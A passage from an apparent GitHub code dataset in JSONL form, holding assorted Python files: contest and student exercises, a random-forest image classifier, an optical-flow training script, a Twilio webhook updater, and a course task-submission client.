[int(i) for i in input('').split(' ')]\n _map.append(temp)\n\nminNum = 1000001\nnumx, numy = 0, 0\nfor i in range(r):\n for j in range(c):\n if _map[i][j] < minNum:\n minNum = _map[i][j]\n numx, numy = i, j\n\"\"\"up, down, right, left\"\"\"\n#print(minNum)\n\nnow = -1\nans = 0\n\nwhile True:\n moving = False\n\n if numx - 1 >= 0 : #up\n if _map[numx -1][numy] > now:\n now = _map[numx][numy]\n numx -= 1\n moving = True\n ans += now\n #print(now)\n\n if numx + 1 < r : #down\n if _map[numx + 1][numy] > now:\n now = _map[numx][numy]\n numx += 1\n moving = True\n ans += now\n #print(now)\n\n if numy - 1 >= 0 : #left\n if _map[numx][numy - 1] > now:\n now = _map[numx][numy - 1]\n numy -= 1\n moving = True\n ans += now\n #print(now)\n\n if numy + 1 < c : #right\n if _map[numx][numy+1] > now:\n now = _map[numx][numy+1]\n numy += 1 \n moving = True\n ans += now\n #print(now)\n\n if moving == False:\n print(ans + minNum)\n break","repo_name":"bochainwu/APCS-record","sub_path":"1086/10862.py","file_name":"10862.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"29462229779","text":"def jerigonzo(string):\n palabra = \"\"\n vocal = [\"a\", \"e\", \"i\", \"o\", \"u\"]\n for i in string:\n if i in vocal:\n palabra += i\n palabra += \"p\"\n palabra += i\n else:\n palabra +=i\n return palabra\ndef rot13(palabra):\n abecedario = \"abcdefghijklmnopqrstuvwxyz\"\n resultado = \"\"\n for letra in palabra:\n resultado += abecedario[(abecedario.find(letra)+13)%26]\n return resultado\n ","repo_name":"pabloschwarzenberg/grader","sub_path":"tema4_ej3/tema4_ej3_918c8c1cac0c377996b3cdeece3eaa2a.py","file_name":"tema4_ej3_918c8c1cac0c377996b3cdeece3eaa2a.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37080110668","text":"cfg_mk = {\n 'diff_area_noise': False, # Add selective recurrent noise to areas\n 'area_noise': 3,\n\n 'linear_mut_info': False, # True if you want the linear decoder\n\n 'path': '/Users/michael/Documents/GitHub/multi-area-cleaned/',\n 'rnn_datapath': '/Users/michael/Documents/GitHub/multi-area-cleaned/saved_rnns_server_apr/data/',\n 'suffix': '', # _outputpos\n 'use_dale': True, # only matters for analysis of mi\n 'rnn_areas': 3, # only matters for analysis\n 'modelpath': '2020-04-10_cb_simple_3areas', # _nodale_ff=0p1', # make sure this matches num_rnn_areas\n 'num_units': 300,\n 'num_seeds': 8, # -1 if did not specify\n\n 'gamma_rec': True, # True if recurrent distribution for Crec is gamma\n 'random_mask_wrec': False, # default is False\n 'random_mask_win': False, # default is False\n 'random_mask_wout': False, # default is False\n 'make_positive': True, # default is true (for training)\n 'positive_ic': True, # default is true\n 'make_positive_output': True, # default is true, False for standard noDale\n\n 'remove_check_noise_before_cue': True # For analysis, esp dpca, removing noise before go cue (default True)\n }\n","repo_name":"mjkleinman/multi-area-cleaned","sub_path":"cfg_mk.py","file_name":"cfg_mk.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"36996378974","text":"import os\nimport datetime\nfrom core.readBin import get_raw_pos\nfrom core.Tint_Matlab import get_setfile_parameter\nimport struct\n\n\ndef get_set_header(set_filename):\n with open(set_filename, 'r+') as f:\n header = ''\n for line in f:\n header += line\n if 'sw_version' in line:\n break\n return header\n\n\ndef create_pos(pos_filename, set_filename, pos_data):\n n = int(pos_data.shape[0])\n\n if os.path.exists(pos_filename):\n return\n\n header = get_set_header(set_filename)\n\n with open(pos_filename, 'wb+') as f: # opening the .pos file\n write_list = []\n\n [write_list.append(bytes('%s\\r\\n' % value, 'utf-8')) for value in header.split('\\n') if value != '']\n\n header_vals = ['num_colours %d' % 4]\n\n '''\n if 'abid' in header.lower():\n header_vals.extend(\n ['\\r\\nmin_x %d' % 0,\n '\\r\\nmax_x %d' % 768,\n '\\r\\nmin_y %d' % 0,\n '\\r\\nmax_y %d' % 574])\n elif 'gus' in header.lower():\n header_vals.extend(\n ['\\r\\nmin_x %d' % 0,\n '\\r\\nmax_x %d' % 640,\n '\\r\\nmin_y %d' % 0,\n '\\r\\nmax_y %d' % 480]\n )\n else:\n header_vals.extend(\n ['\\r\\nmin_x %d' % 0,\n '\\r\\nmax_x %d' % 768,\n '\\r\\nmin_y %d' % 0,\n '\\r\\nmax_y %d' % 574]\n )\n '''\n\n header_vals.extend(\n ['\\r\\nmin_x %d' % 0,\n '\\r\\nmax_x %d' % 768,\n '\\r\\nmin_y %d' % 0,\n '\\r\\nmax_y %d' % 574]\n )\n\n header_vals.extend(\n ['\\r\\nwindow_min_x %d' % int(get_setfile_parameter('xmin', set_filename)),\n '\\r\\nwindow_max_x %d' % int(get_setfile_parameter('xmax', set_filename)),\n '\\r\\nwindow_min_y %d' % int(get_setfile_parameter('ymin', set_filename)),\n '\\r\\nwindow_max_y %d' % int(get_setfile_parameter('ymax', set_filename)),\n '\\r\\ntimebase %d hz' % 50,\n '\\r\\nbytes_per_timestamp %d' % 4,\n '\\r\\nsample_rate %.1f hz' % 50.0,\n '\\r\\nEEG_samples_per_position %d' % 5,\n '\\r\\nbearing_colour_1 %d' % 0,\n '\\r\\nbearing_colour_2 %d' % 0,\n '\\r\\nbearing_colour_3 %d' % 0,\n '\\r\\nbearing_colour_4 %d' % 0,\n '\\r\\npos_format t,x1,y1,x2,y2,numpix1,numpix2',\n '\\r\\nbytes_per_coord %d' % 2,\n '\\r\\npixels_per_metre %f' % float(\n get_setfile_parameter('tracker_pixels_per_metre', set_filename)),\n '\\r\\nnum_pos_samples %d' % n,\n '\\r\\ndata_start'])\n\n for value in header_vals:\n write_list.append(bytes(value, 'utf-8'))\n\n onespot = 1 # this is just in case we decide to add other modes.\n\n if onespot:\n position_format_string = 'i8h'\n position_format_string = '>%s' % (n * position_format_string)\n write_list.append(struct.pack(position_format_string, *pos_data.astype(int).flatten()))\n\n write_list.append(bytes('\\r\\ndata_end\\r\\n', 'utf-8'))\n f.writelines(write_list)\n\n\ndef convert_position(bin_filename, position_filename, set_filename, self=None):\n if not os.path.exists(position_filename):\n\n msg = '[%s %s]: Analyzing the following bin file: %s!' % \\\n (str(datetime.datetime.now().date()),\n str(datetime.datetime.now().time())[:8], bin_filename)\n\n if self is None:\n print(msg)\n else:\n self.LogAppend.myGUI_signal_str.emit(msg)\n\n msg = '[%s %s]: Reading in the position data!' % \\\n (str(datetime.datetime.now().date()),\n str(datetime.datetime.now().time())[:8])\n\n if self is None:\n print(msg)\n else:\n self.LogAppend.myGUI_signal_str.emit(msg)\n\n if not os.path.exists(bin_filename):\n\n msg = '[%s %s]: The following bin file does not exist: %s!' % \\\n (str(datetime.datetime.now().date()),\n str(datetime.datetime.now().time())[:8], bin_filename)\n\n if self is None:\n print(msg)\n else:\n self.LogAppend.myGUI_signal_str.emit(msg)\n\n raise FileNotFoundError(\"The following file does not exist: %s\" % bin_filename)\n\n raw_position = get_raw_pos(bin_filename) # vid time, x1, y1, x2, y2, numpix1, numpix2, total_pix, unused\n\n msg = '[%s %s]: Creating the .pos file!' % \\\n (str(datetime.datetime.now().date()),\n str(datetime.datetime.now().time())[:8])\n\n if self is None:\n print(msg)\n else:\n self.LogAppend.myGUI_signal_str.emit(msg)\n\n create_pos(position_filename, set_filename, raw_position)\n\n else:\n\n msg = '[%s %s]: The following position file already exists: %s!' % \\\n (str(datetime.datetime.now().date()),\n str(datetime.datetime.now().time())[:8], position_filename)\n\n if self is None:\n print(msg)\n else:\n self.LogAppend.myGUI_signal_str.emit(msg)\n","repo_name":"HussainiLab/BinMSGUI","sub_path":"BinMSGUI/core/convert_position.py","file_name":"convert_position.py","file_ext":"py","file_size_in_byte":5160,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"24356165814","text":"import pandas as pd\r\nimport numpy as np\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn import metrics \r\nimport time\r\nimport cv2\r\nimport glob\r\nfrom sklearn import tree\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn import metrics\r\nimport matplotlib.pyplot as plt\r\nimport pydot\r\nfrom io import StringIO\r\nfrom sklearn.tree import export_graphviz\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom sklearn.tree import DecisionTreeClassifier\r\nfrom sklearn import metrics\r\nfrom sklearn.model_selection import train_test_split\r\nimport cv2\r\nimport glob\r\nfrom sklearn import tree\r\nimport time\r\nimport matplotlib\r\nimport pydot\r\nfrom io import StringIO\r\ndef matrix(row,col,imgs):\r\n a = row*col\r\n vector_newX = np.zeros((a, 1))\r\n imgSeq = []\r\n for img in imgs :\r\n o=cv2.imread(img,0)\r\n #print(o)\r\n oriimg = cv2.imread(img, cv2.IMREAD_GRAYSCALE)/255.\r\n #pixel values divide by 255 so that they can be be between 0 and 1\r\n #print(oriimg)\r\n imgSeq.append(img.split('img_')[1].split('.jpg')[0])\r\n img0 = cv2.resize(oriimg,(row,col))\r\n flat = img0.reshape(a,1)\r\n vector_newX = np.c_[vector_newX,flat]\r\n #print(img)\r\n print(imgSeq[0],imgSeq[30],imgSeq[263])\r\n vector_newX = vector_newX.T\r\n finalX_train = vector_newX[1:,:]\r\n print('size of feature martix is:',np.shape(finalX_train))\r\n return finalX_train,imgSeq\r\n\r\ndef tree_function():\r\n \r\n mydata = pd.read_csv(r\"F:\\Trimester2\\BTP\\BTP\\Jan16\\Sobel_train.csv\",header = None)\r\n \r\n X = mydata.iloc[0:,:-1].values #iloc is a --> Purely integer-location based indexing for selection by position from data.\r\n print(X)\r\n Y = mydata.iloc[0:,-1].values\r\n print(Y)\r\n X=X/255.\r\n print(X)\r\n print(np.shape(X))\r\n print(np.shape(Y))\r\n \r\n X_train,X_test,Y_train,Y_test = train_test_split(X,Y,test_size = 0.2,random_state = 50)\r\n\r\n #Create Random Forest classifer object\r\n clf = RandomForestClassifier(n_estimators=50,criterion=\"entropy\")\r\n # Train Random Forest Classifer\r\n clf = clf.fit(X_train,Y_train)\r\n print('Random forest classifer: ')\r\n cnt=0\r\n for t in clf.estimators_:\r\n cnt+=1\r\n print(\"Decision Tree: \",cnt)\r\n r=tree.export_text(t)\r\n #print(r)\r\n print('total decision tree drawn: ',cnt)\r\n '''\r\n fn=data.feature_names\r\n cn=data.target_names\r\n fig, axes = plt.subplots(nrows = 1,ncols = 1,figsize = (4,4), dpi=800)\r\n tree.plot_tree(clf.estimators_[0],feature_names = fn,class_names=cn,filled = True);\r\n fig.savefig('clf_individualtree.png')\r\n '''\r\n #Predict the response for test dataset\r\n Y_pred = clf.predict(X_test)\r\n \r\n Accuracy = metrics.accuracy_score(Y_test, Y_pred)\r\n print(Y_pred)\r\n print(\" Accuracy:\",(Accuracy*100))\r\n return clf,Accuracy\r\n\r\ndef predict(X,imgSeq):\r\n Y_pred_case = clf.predict(X)\r\n print('Predicted Result:',Y_pred_case)\r\n imgLabel = pd.read_csv(\"F:\\Trimester2\\BTP\\BTP\\images\\ImageLabels.csv\")\r\n imgLabel[\"RandomForest_Gray\"]=''\r\n print(imgLabel.head(10))\r\n correct=0\r\n for i,val in enumerate(imgSeq):\r\n imgLabel.loc[imgLabel[\"image\"]==int(val),\"RandomForest_Gray\"]=Y_pred_case[i]\r\n if (Y_pred_case[i] in str(imgLabel.loc[imgLabel[\"image\"]==int(val)][\"label\"])):\r\n correct = correct+1\r\n print(imgLabel.head(10))\r\n total = len(imgSeq)\r\n genAcc = (correct/total) *100\r\n print(correct, \"Images classified correctly out of \",total, \"images\")\r\n print(\"General Accuracy: \",genAcc)\r\n imgLabel.to_csv(r\"F:\\Trimester2\\BTP\\BTP\\images\\updated_ImageLabels.csv\")\r\n\r\n\r\nrow = 64 #height of the image \r\ncol = 64 #width of the image \r\n\r\nimgs = glob.glob(r\"F:\\Trimester2\\BTP\\BTP\\test 500\\*.jpg\")\r\ncombined_train,imgSeq = matrix(row,col,imgs)\r\nclf,acc = tree_function()\r\nstart_time = time.time()\r\npredict(combined_train,imgSeq)\r\n#print(\"--- %s seconds ---\" % (time.time() - start_time))\r\n\r\ndef label(x):\r\n if x==0:\r\n return \"Normal Driving\"\r\n if x==1:\r\n return \"texting - right\"\r\n if x==2:\r\n return \"talking on phone - right\"\r\n if x==3:\r\n return \"texting - left\"\r\n if x==4:\r\n return \"talking on phone - left\"\r\n if x==5:\r\n return \"operating the radio\"\r\n if x==6:\r\n return \"drinking\"\r\n if x==7:\r\n return \"reaching behind\"\r\n if x==8:\r\n return \"hair and makeup\"\r\n if x==9:\r\n return \"talking to passenger\"\r\n\r\nimgs = glob.glob(r\"F:\\Trimester2\\BTP\\BTP\\Jan11\\Test\\*.jpg\")\r\nDDEPTH = cv2.CV_16S\r\nfor img in imgs:\r\n oriimg = cv2.imread(img,0)\r\n img0 = cv2.resize(oriimg,(64,64))\r\n\r\n img1 = cv2.GaussianBlur(img0, (3, 3), 2)\r\n\r\n gradx = cv2.Sobel(img1, DDEPTH , 1, 0, ksize=3, scale=1, delta=0)\r\n gradx = cv2.convertScaleAbs(gradx)\r\n \r\n grady = cv2.Sobel(img1, DDEPTH , 0, 1, ksize=3, scale=1, delta=0)\r\n grady = cv2.convertScaleAbs(grady)\r\n \r\n grad = cv2.addWeighted(gradx, 0.5, grady, 0.5, 0)\r\n #print(np.shape(grad))\r\n flat = grad.reshape(1,64*64)\r\n\r\n\r\n #flat = img0.reshape(1,64*64)\r\n state=clf.predict(flat)\r\n print(str(state[0]))\r\n lb=int(str(state[0])[1])\r\n print(lb)\r\n msg=label(lb)\r\n cv2.rectangle(oriimg, (40, 52), (420, 8), (255,255,255), cv2.FILLED)\r\n cv2.rectangle(oriimg, (40, 52), (420, 8), (0,0,0), 3)\r\n cv2.putText(oriimg, msg, (40, 40), cv2.FONT_HERSHEY_SIMPLEX, 1.15, (0, 255, 0), 2)\r\n cv2.imshow('Distraction',oriimg)\r\n cv2.waitKey(0)","repo_name":"jpvaishnav/Driver-Distraction-Detection","sub_path":"RandomForest.py","file_name":"RandomForest.py","file_ext":"py","file_size_in_byte":5547,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"1992135389","text":"N = int(input())\r\nnumbers = list(map(int, input().split()))\r\nX = [-1 for _ in range(N)]\r\nstacks = []\r\nfor i in range(N-1, -1, -1):\r\n target = numbers[i]\r\n while stacks and stacks[-1] <= target:\r\n stacks.pop()\r\n if not stacks : X[i] = -1\r\n if stacks : X[i] = stacks[-1]\r\n stacks.append(target)\r\nprint(*X)","repo_name":"Kimsc9976/study_algorithm","sub_path":"백준/Gold/17298. 오큰수/오큰수.py","file_name":"오큰수.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18799674974","text":"def grader(score: float):\r\n \"\"\" determines the grade and grade point of a score\"\"\"\r\n score = float(score)\r\n if score > 100:\r\n raise ValueError('Score can\\'t be above 100!')\r\n elif score >= 70:\r\n grade, grade_point = 'A', 5\r\n elif score >= 60 and score <= 69:\r\n grade, grade_point = 'B', 4\r\n elif score >= 50 and score <= 59:\r\n grade, grade_point = 'C', 3\r\n elif score >= 45 and score <= 49:\r\n grade, grade_point = 'D', 2\r\n elif score >= 40 and score <= 44:\r\n grade, grade_point = 'E', 1\r\n elif score <= 39:\r\n grade, grade_point = 'F', 0\r\n return grade, grade_point\r\n\r\n\r\ndef gpaCalc(dict_of_results: dict):\r\n \"\"\"\r\n computes the gpa of student and the dict_of_results\r\n is updated with more info\r\n dict_of_results takes this format\r\n dict_of_results = {course_code: [unit, score]}\r\n tnu = Total No. of Units\r\n tcp = Total Credit Points\r\n \"\"\"\r\n tnu, tcp = 0, 0\r\n for course_code, list_of_info in dict_of_results.items():\r\n unit: int = list_of_info[0]\r\n score: int = list_of_info[1]\r\n grade = grader(score)[0]\r\n grade_point = grader(score)[1]\r\n credit_point = grade_point * unit\r\n dict_of_results[course_code].append((grade, grade_point, credit_point))\r\n tnu += unit\r\n tcp += credit_point\r\n gpa = tcp/tnu\r\n #since gpa is rounded accurately to 2 d.p\r\n return round(gpa, 2)\r\n\r\n#test code\r\ndude_results = {'MTH101': [4, 56],'CHM101': [5, 65],'PHY101': [3, 59],'CSC101': [1, 47]}\r\nprint(f'Your GPA is: {gpaCalc(dude_results)}')\r\n","repo_name":"BOVAGE/CSC201","sub_path":"gpacalc.py","file_name":"gpacalc.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"28737715939","text":"#!/usr/bin/env python\nimport os\nimport pymongo\nfrom datetime import datetime\n\nimport tensorflow as tf\n\nfrom config import configs\nfrom data_loader import get_loader\nfrom data_loader_w_events import get_loader as get_loader_events\nfrom EVFlowNet import EVFlowNet\n\nfrom termcolor import colored\nfrom sacred import Experiment\nfrom sacred.observers import MongoObserver\nfrom sacred.utils import apply_backspaces_and_linefeeds\n\n\ndef dump_to_yaml(args, path):\n with open(path, 'w') as fp:\n for k, v in vars(args).items():\n if isinstance(v, list):\n v = \"[\"+\"\".join([\"{}, \".format(z) for z in v])[:-len(\", \")]+\"]\"\n if isinstance(v, str) and len(v) == 0:\n continue\n if v is None:\n continue\n fp.write(\"{}: {}\\n\".format(k, v))\n\n\ndef mongo_compatible(obj):\n if isinstance(obj, dict):\n res = dict()\n for key, value in obj.items():\n key = key.replace(\".\", ',').replace(\"$\", \"S\")\n res[key] = mongo_compatible(value)\n return res\n elif isinstance(obj, (list, tuple)):\n return list([mongo_compatible(value) for value in obj])\n return obj\n\n\ndef main():\n args = configs()\n\n args.restore_path = None\n if args.training_instance:\n if \".ckpt\" in args.training_instance:\n training_dir, _ = os.path.splitext(args.training_instance)\n args.restore_path = args.training_instance\n else:\n args.restore_path = tf.train.latest_checkpoint(args.training_instance)\n training_dir = args.training_instance\n print(\"Restoring checkpoint:\", args.restore_path)\n\n args.load_path = os.path.join(args.load_path, training_dir)\n args.summary_path = os.path.join(args.summary_path, training_dir)\n else:\n args.load_path = os.path.join(args.load_path,\n \"evflownet_{}_{}\".format(datetime.now()\n .strftime(\"%m%d_%H%M%S\"),\n args.exp_name))\n args.summary_path = os.path.join(args.summary_path,\n \"evflownet_{}_{}\".format(datetime.now()\n .strftime(\"%m%d_%H%M%S\"),\n args.exp_name))\n\n os.makedirs(args.load_path)\n dump_to_yaml(args, os.path.join(args.load_path, \"args.yaml\"))\n\n if args.sacred:\n sacred_exp = Experiment(args.exp_name)\n sacred_exp.captured_out_filter = apply_backspaces_and_linefeeds\n conf = vars(args)\n conf.update({'log_dir': args.load_path})\n conf.update({'summary_path': args.summary_path})\n sacred_exp.add_config(mongo_compatible(conf))\n\n if not args.mongodb_disable:\n url = \"{0.mongodb_url}:{0.mongodb_port}\".format(args)\n db_name = args.mongodb_name\n\n overwrite = None\n if args.restore_path is not None:\n client = pymongo.MongoClient(url)\n database = client[db_name]\n runs = database[\"runs\"]\n matches = runs.find({\"config.log_dir\": args.load_path})\n if matches.count() > 1:\n raise ValueError(\"Multiple MongoDB entries found with the specified path!\")\n elif matches.count() == 0:\n raise ValueError(\"No MongoDB entriy found with the specified path!\")\n else:\n overwrite = matches[0]['_id']\n\n print(colored('Connect to MongoDB@{}:{}'.format(url, db_name), \"green\"))\n sacred_exp.observers.append(MongoObserver.create(url=url,\n db_name=db_name,\n overwrite=overwrite))\n\n if not os.path.exists(args.load_path):\n os.makedirs(args.load_path)\n if not os.path.exists(args.summary_path):\n os.makedirs(args.summary_path)\n\n # Fix the random seed for reproducibility.\n # Remove this if you are using this code for something else!\n tf.set_random_seed(12345)\n\n if args.do_aug_rewind:\n if args.no_aug_rot is False:\n raise ValueError(\"no_aug_rot = False Not supported when do_aug_rewind = True\")\n\n print(\"Using Event Loader for rewind augmentation!\")\n loader_vals = get_loader_events(\n args.data_path, args.batch_size, args.image_width, args.image_height,\n split='train',\n shuffle=True,\n sequence=args.sequences,\n rotation=not args.no_aug_rot,\n rewind=args.do_aug_rewind,\n flip_updown=args.do_aug_flip_updown,\n nskips=args.loader_n_skips,\n binarize_polarity=args.loader_binarize_polarity)\n (events_loader, lengths_loader,\n event_img_loader, prev_img_loader,\n next_img_loader, _, rot_angle, crop_bbox, n_ima) = loader_vals\n else:\n event_img_loader, prev_img_loader, next_img_loader, _, n_ima = get_loader(\n args.data_path, args.batch_size, args.image_width, args.image_height,\n split='train',\n shuffle=True,\n sequence=args.sequences,\n rotation=not args.no_aug_rot,\n flip_updown=args.do_aug_flip_updown,\n nskips=args.loader_n_skips,\n gzip=args.gzip)\n print(\"Number of images: {}\".format(n_ima))\n \n trainer = EVFlowNet(args,\n event_img_loader,\n prev_img_loader,\n next_img_loader,\n n_ima,\n is_training=True)\n\n if args.sacred:\n @sacred_exp.main\n def train_wrapped():\n return trainer.train()\n sacred_exp.run()\n else:\n trainer.train()\n \nif __name__ == \"__main__\":\n main()\n","repo_name":"marcocannici/matrixlstm","sub_path":"opticalflow/src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5967,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"77"} +{"seq_id":"29346546329","text":"#Cálculo del dígito verificador de un rut\nrut=int(input(\"Ingrese un rol único tributario: \"))\n\n#Formula digito x digito\npd = (rut//10000000)\nsd = ((rut//1000000)%10)\ntd = ((rut//100000)%10)\ncd = ((rut//10000)%10)\nqd = ((rut//1000)%10)\nsed = ((rut//100)%10)\nsepd = ((rut//10)%10)\nod = ((rut)%10)\n\n#Desarrollo del calculo\ncalculo = ((pd*3)+(sd*2)+(td*7)+(cd*6)+(qd*5)+(sed*4)+(sepd*3)+(od*2))\nx = calculo // 11\ny = calculo -(11*x)\nresultado = 11 - y\n\n#Especificaciones\nif resultado == 11:\n print(\"dv=\"+\"0\")\n\nelse:\n if resultado == 10:\n print(\"dv=\"+\"k\")\n\n else:\n print(\"dv=\",end=\"\")\n print(resultado)","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej5/hito1_ej5_d8f274901e0d61269f9e5630aed1a18b.py","file_name":"hito1_ej5_d8f274901e0d61269f9e5630aed1a18b.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29312141229","text":"#Juego adivina mi número\nimport random\nn=random.randint(1,20)\ni=0\nprint('tienes 5 intentos para adivinar mi numero')\nwhile i<5:\n jugador=int(input('>>>> ingresa un numero: '))\n if jugadorn:\n print('el numero que ingresaste es mayor al numero secreto')\n i+=1\n elif jugador==n:\n print('¡ADIVINASTE!, felicitaciones mi número era', n)\nelse: \n print('¡Mala suerte! no adivinaste, mi número era ',n) ","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej12/hito1_ej12_d64371c5549376406357051b356ecb41.py","file_name":"hito1_ej12_d64371c5549376406357051b356ecb41.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29485635469","text":"class Matriz:\n def __init__(self, celdas=[]):\n self.celdas = celdas\n\n def __repr__(self):\n s = \"\"\n for i in range(len(self.celdas)):\n for j in range(len(self.celdas[i])):\n s += \"{0: >5} \".format(self.celdas[i][j])\n s += \"\\n\"\n return s\n\n def __mul__(self, other):\n if len(self.celdas[0]) != len(other.celdas):\n raise ValueError(\"No se pueden multiplicar las matrices. El número de columnas de la primera matriz debe ser igual al número de filas de la segunda matriz.\")\n\n resultado = []\n for i in range(len(self.celdas)):\n fila_resultado = []\n for j in range(len(other.celdas[0])):\n suma = 0\n for k in range(len(self.celdas[0])):\n suma += self.celdas[i][k] * other.celdas[k][j]\n fila_resultado.append(suma)\n resultado.append(fila_resultado)\n\n return Matriz(resultado)\n","repo_name":"pabloschwarzenberg/grader","sub_path":"tema9_ej2/tema9_ej2_4c8d8f087995b0de7dd597912841a5bf.py","file_name":"tema9_ej2_4c8d8f087995b0de7dd597912841a5bf.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8050690465","text":"from twilio.rest import Client\nfrom pyngrok import ngrok\nimport os\nfrom decouple import config\n\n\ndef update_ngrok_url():\n url = ngrok.connect(8000).public_url\n print(' * Tunnel URL:', url)\n account_sid = config('TWILIO_ACCOUNT_SID')\n auth_token = config('TWILIO_AUTH_TOKEN')\n client = Client(account_sid, auth_token)\n incoming_phone_numbers = client.incoming_phone_numbers.list(limit=20)\n\n for record in incoming_phone_numbers:\n print(record.friendly_name)\n if record.friendly_name == '(825) 251-9025':\n client.incoming_phone_numbers(record.sid).update(voice_url=url + '/shipping_ivr/welcome')\n\n\nif __name__ == '__main__':\n update_ngrok_url()\n","repo_name":"PavithraGunasekaran/Cloud-IVR-System","sub_path":"ivr/shipping_ivr/utils/ngrok_update.py","file_name":"ngrok_update.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"20877667742","text":"#defi 1\nmot=input(\"entrer un mot :\")\ndico={}\nfor i in range(len(mot)):\n if mot[i] not in dico:\n dico[mot[i]]=[]\n dico[mot[i]].append(i)\nprint(dico)\n\n\n#defi 2\nitems_purchase={\n \"sac\":5000,\n \"nano\":90000,\n \"pc hp\":20000,\n \"apple\":600000,\n \"sirius\":400000\n}\n\nwallet=100000\n\ngood_items=[]\n\nfor i in items_purchase:\n if items_purchase[i] <=wallet:\n good_items.append(i)\n\nif len(good_items)==0:\n print(\"Rien\")\nelse:\n print(good_items)","repo_name":"sidiki-codeur/di-bootcamp-stage1","sub_path":"week-4/day-3/defi.py","file_name":"defi.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18040608139","text":"# from sys import stdin\n\n# stdin = open('input.txt', 'r')\n# input = stdin.readline\n\n# inputs\nn, k = map(int, input().split())\ncoins = [int(input()) for _ in range(n)]\n\n# init\ncnt = 0\n\n# exe\ndef sol(k, coins):\n global cnt\n my_list = coins[:]\n while True:\n coin = my_list.pop()\n if coin <= k:\n break\n q = k // coin\n for num in range(q, -1, -1):\n r = k - num * coin\n # print(\"k: \", k, \"coin: \", coin, \"num: \", num, \"r: \", r)\n if r == 0:\n cnt += 1\n elif len(my_list) >= 2:\n sol(r, my_list)\n elif len(my_list) == 1:\n if r % my_list[0] == 0:\n cnt += 1\n \nsol(k, coins)\nprint(cnt)","repo_name":"ririro93/algorithm_probs","sub_path":"Baekjoon/2nd_week/2293.py","file_name":"2293.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"41826825536","text":"# -*- coding: utf-8 -*-\nimport http.client,json,os\nimport codecs\n\n#proxy sans schema\nproxy=None\nnoproxy=0\nhost = \"www.irem.sciences.univ-nantes.fr\"\nuser=None\n#host='localhost:8080'\n\nservice = '/mathinfo/x3m0080'\n\ndef get_proxy() :\n global proxy\n if proxy : return \n proxy=os.getenv('http_proxy')\n if not proxy : proxy = os.getenv('HTTP_PROXY')\n if proxy and proxy[:7] == \"http://\" :\n proxy = proxy[7:]\n\ndef do_request(method, host, path, **args) :\n if not noproxy : get_proxy()\n if proxy :\n h = http.client.HTTPConnection(proxy)\n h.request(method, 'http://' + host + path, **args)\n else:\n h = http.client.HTTPConnection(host)\n h.request(method, path,**args)\n resp = h.getresponse()\n status = resp.status\n reason = resp.reason\n bd = resp.read().decode('utf-8')\n h.close()\n return status,reason,bd\n\ndef show_example(taskid) :\n path = service + '/example/' + taskid\n status,r,bd = do_request('GET',host,path)\n if status == 200:\n bd = json.loads(bd)\n print(\"Input :\" , bd['input'])\n print(\"Result :\" , bd['result'])\n elif status == 404:\n print(bd)\n print(taskid,\"not found\")\n else:\n print(\"Error:\",status,r,bd)\n\ndef get_user() :\n global user\n if user != None:\n etud = user\n else:\n etud = os.getenv(\"LOGNAME\").upper()\n if etud[0] == 'E' : etud = etud[1:]\n print(\"Identifiant :\", etud)\n return etud\n\ndef set_user(usr):\n global user\n user = str(usr)\n\ndef get_task(taskid) :\n path = service + '/task/' + taskid\n status,r,bd = do_request('GET',host,path)\n if status == 200:\n bd = json.loads(bd)\n return bd['hash'], bd['input']\n if status == 404 :\n print(bd)\n print(taskid, \"not found\")\n else:\n print(\"Error:\",status,r,bd)\n\ndef check_task(taskid,h,result) :\n path = service + '/task/' + taskid\n body = {'user': get_user(), 'hash':h, 'result': result}\n status,r,bd = do_request('PUT',host,path,body=json.dumps(body))\n if status == 202:\n print(\"Input accepté\")\n return True\n elif status == 406:\n print(\"Input refusé\")\n return False\n elif status == 410:\n print(\"Hash gone : please retry\")\n elif status == 404:\n print(\"Resource not found :\", bd)\n else:\n print(\"Error:\",status,r)\n print(\"EMsg :\",bd)\n\ndef hello(etud=None) :\n if not etud : etud = get_user()\n path = service + '/hello/' + etud\n status,r,bd = do_request('GET',host,path)\n if status == 302:\n print(\"User \", etud, \"found\")\n elif status == 404:\n print(\"User \", etud, \"not found\")\n else:\n print (\"Error :\", status, r, bd)\n\ndef tasklist() :\n hello()\n path = service + \"/tasklist\"\n s,r,bd = do_request(\"GET\",host,path)\n if s == 200 